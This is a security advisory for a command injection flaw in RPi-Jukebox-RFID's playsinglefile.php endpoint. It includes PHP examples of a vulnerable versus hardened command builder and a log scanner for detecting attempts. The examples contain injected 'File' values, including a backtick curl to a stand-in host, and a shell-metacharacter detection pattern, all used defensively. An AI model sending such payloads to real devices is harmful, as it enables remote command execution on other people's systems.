
CVE-2025-10328: OS Command Injection in MiczFlor RPi-Jukebox-RFID

Severity: Medium
Published: Fri Sep 12 2025 (09/12/2025, 21:32:08 UTC)
Source: CVE Database V5
Vendor/Project: MiczFlor
Product: RPi-Jukebox-RFID

Description

A security vulnerability has been detected in MiczFlor RPi-Jukebox-RFID up to 2.8.0. Affected by this issue is some unknown functionality of the file /htdocs/api/playlist/playsinglefile.php. The manipulation of the argument File leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AI-Powered Analysis

Last updated: 09/12/2025, 21:37:27 UTC

Technical Analysis

CVE-2025-10328 is an OS command injection vulnerability in MiczFlor RPi-Jukebox-RFID, affecting versions up to 2.8.0. The flaw is in the file /htdocs/api/playlist/playsinglefile.php, where the 'File' argument is not sanitized before it reaches a shell command, so an attacker who controls that argument can execute arbitrary operating system commands on the device running the jukebox. The attack is reachable over the network and needs no user interaction; the published vector does, however, record low privileges required (PR:L), so the entry point is not fully unauthenticated. An exploit has been disclosed publicly, and the vendor had not responded or provided a patch at the time of disclosure. The CVSS 4.0 base score is 5.3 (medium). The vector records a network attack vector (AV:N), low attack complexity (AC:L), low privileges required (PR:L), no user interaction (UI:N), and low confidentiality, integrity and availability impact on the vulnerable system (VC:L, VI:L, VA:L). The 'S:N' given in the original analysis is not a CVSS 4.0 metric: version 4.0 drops the v3 Scope metric in favour of separate subsequent-system confidentiality, integrity and availability metrics (SC/SI/SA). The exploit-maturity value E:P means a proof-of-concept exploit exists, not that exploitation is 'partially functional'. The 'low' impact ratings are a scoring outcome, not a description of what an attacker gets: command execution on the device yields whatever the web server's user can do, which is typically enough to read configuration, alter playback and use the device as a foothold on the local network. The vulnerability is particularly concerning for deployments of RPi-Jukebox-RFID on Raspberry Pi devices, commonly used for media playback with RFID control in home, educational or small business environments, and the lack of vendor response and patch availability lengthens the window of exposure for affected users.
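The pattern described above, as an added illustration that is not code from RPi-Jukebox-RFID: a hypothetical handler that concatenates the 'File' request argument into a shell command, beside a hardened version that allowlists the name, confines the resolved path to the media directory and quotes the argument. The player command (mpg123), the media directory and the function names are assumptions for the example; the real playsinglefile.php may differ. Commands are only built and printed, never executed.

```php
<?php
declare(strict_types=1);

// Added illustration, not code from RPi-Jukebox-RFID. Assumptions: the player is
// invoked as "mpg123 <path>" and all media sits under one directory. Requires PHP 8.

// Vulnerable pattern: unescaped request data concatenated into a shell command.
// Anything the shell treats specially (";", "|", "$(...)", "`...`") starts a second command.
function buildPlayCommandVulnerable(string $file): string
{
    $mediaRoot = '/home/pi/audiofolders';           // assumed location
    return 'mpg123 ' . $mediaRoot . '/' . $file;    // File=song.mp3; id  ->  "mpg123 .../song.mp3; id"
}

// Hardened pattern: allowlist the name, confine the resolved path, then quote the argument.
// Returns null when the request must be rejected.
function buildPlayCommandHardened(string $file, string $mediaRoot): ?string
{
    // 1. Only a single filename component with an expected audio extension.
    if (!preg_match('/\A[A-Za-z0-9 ._-]+\.(mp3|ogg|wav|flac)\z/', $file)) {
        return null;
    }
    // 2. The resolved path must exist and sit inside the media root (blocks ../ and symlink escapes).
    $root = realpath($mediaRoot);
    $real = realpath($mediaRoot . DIRECTORY_SEPARATOR . $file);
    if ($root === false || $real === false
        || !str_starts_with($real, $root . DIRECTORY_SEPARATOR)) {
        return null;
    }
    // 3. Quote anyway: escapeshellarg() single-quotes the value so the shell sees one argument.
    return 'mpg123 ' . escapeshellarg($real);
}

// Self-check on a constructed media directory; commands are only built, never executed.
function demo(): array
{
    $root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'jukebox-demo-' . getmypid();
    mkdir($root, 0700, true);
    file_put_contents($root . DIRECTORY_SEPARATOR . 'song.mp3', 'placeholder');  // constructed file

    $results = [
        'vulnerable, benign'   => buildPlayCommandVulnerable('song.mp3'),
        'vulnerable, injected' => buildPlayCommandVulnerable('song.mp3; id'),
        'hardened, benign'     => buildPlayCommandHardened('song.mp3', $root),
        'hardened, injected'   => buildPlayCommandHardened('song.mp3; id', $root),
        'hardened, traversal'  => buildPlayCommandHardened('../../etc/passwd', $root),
        'hardened, missing'    => buildPlayCommandHardened('nope.mp3', $root),
    ];

    unlink($root . DIRECTORY_SEPARATOR . 'song.mp3');
    rmdir($root);
    return $results;
}

foreach (demo() as $case => $command) {
    printf("%-22s %s\n", $case, $command === null ? 'REJECTED' : $command);
}
```

The vulnerable builder returns a command string that ends in "; id" for the injected input, which a shell would run as a second command; the hardened builder rejects that input at the allowlist step, rejects the traversal attempt before any path resolution, rejects a name that does not resolve inside the media root, and single-quotes the one path it does accept. Validation and escapeshellarg() are used together because each covers a failure of the other: the allowlist can be loosened by a later change, and quoting alone does nothing against traversal.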

Potential Impact

For European organizations, the impact of this vulnerability depends on the extent to which RPi-Jukebox-RFID is deployed within their environments. While the product is niche and primarily used for media playback controlled by RFID, it may be present in educational institutions, libraries, museums, or small businesses that use Raspberry Pi devices for interactive audio systems. Successful exploitation allows an attacker to execute arbitrary commands on the device, potentially leading to unauthorized access to local network resources, data leakage, or pivoting to other systems. Although the CVSS score is medium, remote exploitation needs no user interaction and only low privileges, which is a concern in environments where network segmentation is weak. The scored impact on confidentiality, integrity, and availability is low but non-negligible: attackers could disrupt media services or use the compromised device as a foothold for further attacks. Because the vendor has not issued a patch, organizations face increased risk until mitigations or updates are applied. The threat is greater where these devices are connected to critical networks or hold sensitive data, or where they are reachable from untrusted networks.

Mitigation Recommendations

Since no official patch is available, European organizations should implement specific mitigations to reduce risk. First, restrict network access to RPi-Jukebox-RFID devices by placing them behind firewalls or on VLANs that limit exposure to trusted users and systems only. Disable or restrict remote access to the vulnerable endpoint (the handler at /htdocs/api/playlist/playsinglefile.php) using a web application firewall (WAF) or a reverse proxy with rules that block shell metacharacters and path traversal in the 'File' parameter; treat this as a stopgap, since pattern rules are bypassable through encoding, and the durable fix is input validation and argument escaping in the endpoint itself. Employ network monitoring and intrusion detection systems (IDS) to detect command injection attempts. Replace or upgrade to a newer version of the software once a patch is released. As an interim measure, consider disabling the vulnerable functionality if it is not essential. Additionally, enforce the principle of least privilege on the Raspberry Pi devices, ensuring that the user context running the RPi-Jukebox-RFID service has minimal permissions, so that a successful injection cannot be turned into root access. Regularly audit and monitor web-server logs for signs of exploitation attempts. Finally, educate users and administrators about the risks and encourage timely updates once a patch becomes available.
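The log-audit step above, as an added detection example that is not part of the advisory or the project: it scans web-server access log lines for requests to the playsinglefile.php endpoint whose URL-decoded 'File' value contains shell metacharacters or a traversal sequence. The log lines are constructed for the example; the URL path /api/playlist/playsinglefile.php assumes that htdocs is the web root, and the common log format and PHP 8 are assumptions as well.

```php
<?php
declare(strict_types=1);

// Added detection example, not code from the advisory or from RPi-Jukebox-RFID.
// Assumptions: htdocs is the web root (so the URL path is /api/playlist/playsinglefile.php),
// the web server writes the common log format, and PHP 8 is available.

// Constructed sample log lines, not real traffic. Lines 2 and 3 carry payloads.
const SAMPLE_LOG = <<<'LOG'
192.168.1.20 - - [12/Sep/2025:21:30:01 +0000] "GET /api/playlist/playsinglefile.php?File=song.mp3 HTTP/1.1" 200 12
203.0.113.7 - - [12/Sep/2025:21:30:05 +0000] "GET /api/playlist/playsinglefile.php?File=song.mp3%3B%20id HTTP/1.1" 200 12
203.0.113.7 - - [12/Sep/2025:21:30:09 +0000] "GET /api/playlist/playsinglefile.php?File=%60curl%20http%3A%2F%2F203.0.113.7%2Fx%60 HTTP/1.1" 200 12
192.168.1.21 - - [12/Sep/2025:21:31:00 +0000] "GET /api/playlist/playsinglefile.php?File=a%20song.mp3 HTTP/1.1" 200 12
192.168.1.22 - - [12/Sep/2025:21:31:30 +0000] "GET /index.php HTTP/1.1" 200 5000
LOG;

// Characters that let a value escape a shell command or a directory. Checked after URL
// decoding so that encoded forms such as %3B (";") and %60 ("`") are caught.
const SUSPICIOUS = '/[;&|`$<>(){}\\\\\r\n]|\.\.\//';

/** @return list<array{ip: string, time: string, file: string}> */
function findInjectionAttempts(string $log): array
{
    $hits = [];
    foreach (explode("\n", $log) as $line) {
        // client, ident, user, [timestamp], "METHOD target"
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+)/', $line, $m)) {
            continue;
        }
        [, $ip, $time, $target] = $m;
        $path  = parse_url($target, PHP_URL_PATH);
        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($path) || !is_string($query) || !str_ends_with($path, '/playsinglefile.php')) {
            continue;
        }
        parse_str($query, $params);            // percent-decodes the values
        $file = $params['File'] ?? null;
        if (is_string($file) && preg_match(SUSPICIOUS, $file)) {
            $hits[] = ['ip' => $ip, 'time' => $time, 'file' => $file];
        }
    }
    return $hits;
}

foreach (findInjectionAttempts(SAMPLE_LOG) as $hit) {
    printf("%s %s File=%s\n", $hit['time'], $hit['ip'], $hit['file']);
}
```

Run against the sample, the scanner reports the two requests from 203.0.113.7 (the ";" separator and the backtick substitution) and ignores the benign file names, including the one with an encoded space. Decoding before matching matters: a rule that inspects the raw request line would miss %3B and %60, which is also why a WAF rule on the raw query string is only a stopgap. Data that is POSTed or that arrives in a header is not in the access log at all; for that, the application-side fix is the only reliable control.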


Technical Details

Data Version
5.1
Assigner Short Name
VulDB
Date Reserved
2025-09-12T08:34:31.071Z
Cvss Version
4.0
State
PUBLISHED

Threat ID: 68c49285e7ced5bb5fd749ba

Added to database: 9/12/2025, 9:37:09 PM

Last enriched: 9/12/2025, 9:37:27 PM

Last updated: 9/12/2025, 9:37:32 PM

